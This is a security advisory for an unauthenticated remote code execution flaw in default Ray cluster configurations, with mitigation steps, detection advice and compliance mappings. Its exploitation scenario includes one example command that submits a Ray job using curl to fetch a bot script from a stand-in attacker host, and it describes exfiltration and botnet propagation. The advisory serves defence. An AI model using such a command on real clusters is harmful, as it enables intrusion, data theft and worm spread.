CVE-2025-34351

GHSA-gx77-xgc2-4888 CRITICAL
Published November 27, 2025
CISO Take

Any Ray cluster reachable from your network is compromised by default — no credentials required to submit jobs and execute arbitrary code across the entire cluster. Enable RAY_AUTH_MODE=token immediately and firewall Ray ports (8265, 10001) from untrusted networks; there is no patch, only mitigation. This is being actively exploited in the wild: the ShadowRay 2.0 campaign hijacks AI compute clusters into self-propagating botnets.

Affected Systems

Package Ecosystem Vulnerable Range Patched
ray pip <= 2.52.0 No patch

Do you use ray? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.5%
chance of exploitation in 30 days
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. IMMEDIATE (do today): 1) Audit all Ray deployments — test unauthenticated access to port 8265 across your environment. 2) Set RAY_AUTH_MODE=token in all Ray head node configurations and restart clusters. 3) Firewall ports 8265 (dashboard), 10001 (client), and 8076 (metrics) to trusted CIDR ranges only — treat these as equivalent to database ports. SHORT-TERM (this week): 4) Rotate all secrets, API keys, and cloud credentials accessible from Ray cluster environments. 5) Review Ray job submission history for unauthorized activity. 6) Implement network segmentation isolating ML training infrastructure from internet-facing systems. 7) Add IaC policy controls preventing Ray deployment without token auth enabled. DETECTION: Alert on unexpected Ray job submissions, unusual compute spikes on ML nodes, and outbound connections from Ray workers to non-expected IPs. Search logs for Ray Jobs API calls without Authorization headers.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.15 - Accuracy, robustness and cybersecurity Art.9 - Risk management system for high-risk AI Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.2 - AI system risk management A.8.2 - AI system security testing A.9.1 - Information security for AI systems A.9.4 - AI system access control
NIST AI RMF
GOVERN-1.2 - Risk tolerances are established for AI development and deployment GOVERN-6.2 - Organizational policies address AI system cybersecurity MANAGE-2.2 - Mechanisms are in place and applied for response to AI risk
OWASP LLM Top 10
LLM03:2025 - Training Data Poisoning LLM05:2025 - Supply Chain Vulnerabilities LLM08 - Excessive Agency

Technical Details

NVD Description

Anyscale Ray 2.52.0 contains an insecure default configuration in which token-based authentication for Ray management interfaces (including the dashboard and Jobs API) is disabled unless explicitly enabled by setting RAY_AUTH_MODE=token. In the default unauthenticated state, a remote attacker with network access to these interfaces can submit jobs and execute arbitrary code on the Ray cluster. NOTE: The vendor plans to enable token authentication by default in a future release. They recommend enabling token authentication to protect your cluster from unauthorized access.

Exploitation Scenario

An adversary runs a Shodan/Censys scan for exposed Ray dashboards on port 8265 — a trivial 5-minute operation. Upon finding an unauthenticated endpoint, they submit a malicious Python job via the Jobs API: 'ray job submit -- python -c "import subprocess,os; subprocess.Popen([curl,attacker.com/bot.sh,-o,/tmp/x]);"'. The job executes on all cluster nodes with the permissions of the Ray worker process, which in cloud environments typically carries attached IAM roles with broad S3/GCS/blob storage access. Within minutes the attacker has: exfiltrated model weights and training data, installed a persistent backdoor, and enrolled the cluster in the ShadowRay 2.0 botnet — which then uses the compromised cluster to scan for and attack other exposed Ray instances, creating a self-propagating AI compute worm. The entire attack chain requires no AI/ML expertise, only awareness that Ray auth is off by default.

Timeline

Published
November 27, 2025
Last Modified
December 1, 2025
First Seen
March 24, 2026